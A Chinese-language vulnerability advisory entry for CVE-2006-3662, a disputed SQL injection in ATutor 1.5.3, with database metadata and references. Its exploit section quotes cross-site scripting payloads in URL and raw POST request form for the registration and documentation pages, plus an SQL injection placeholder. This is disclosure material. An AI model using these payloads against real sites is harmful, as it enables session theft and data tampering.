Atutor 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110583 漏洞类型 SQL注入
发布时间 2006-07-08 更新时间 2006-07-26
CVE编号 CVE-2006-3662 CNNVD-ID CNNVD-200607-269
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-269
|漏洞详情
**有争议**ATutor1.5.3中的index.php存在SQL注入漏洞,远程攻击者可以通过fid参数来执行任意SQL命令。注:厂商对此提出反驳,声称"所提到的SQL注入漏洞是不可能的。"但是,相关源代码显示此问题可能是真实的,而该参数在1.5.3.1中得到了清理。
|漏洞EXP
source: http://www.securityfocus.com/bid/18898/info

ATutor is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script>
POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
ml=1&year="><script>alert(/EllipsisSecurityTest/)</script>
POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
ml=1&month="><script>alert(/EllipsisSecurityTest/)</script>
POST http://www.example.com:80/registration.php?register=Register HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
ml=1&day="><script>alert(/EllipsisSecurityTest/)</script>
http://www.example.com/forum/index.php?fid=-1[SQL]
|参考资料

来源:XF
名称:atutor-index-sql-injection(27620)
链接:http://xforce.iss.net/xforce/xfdb/27620
来源:BID
名称:18898
链接:http://www.securityfocus.com/bid/18898
来源:BUGTRAQ
名称:20060711Re:ATutor1.5.3CrossSiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/439873/100/100/threaded
来源:BUGTRAQ
名称:20060708ATutor1.5.3CrossSiteScripting
链接:http://archives.neohapsis.com/archives/bugtraq/2006-07/0096.html
来源:BUGTRAQ
名称:20060721Re:ATutor1.5.3CrossSiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/440837/100/100/threaded
来源:OSVDB
名称:28188
链接:http://www.osvdb.org/28188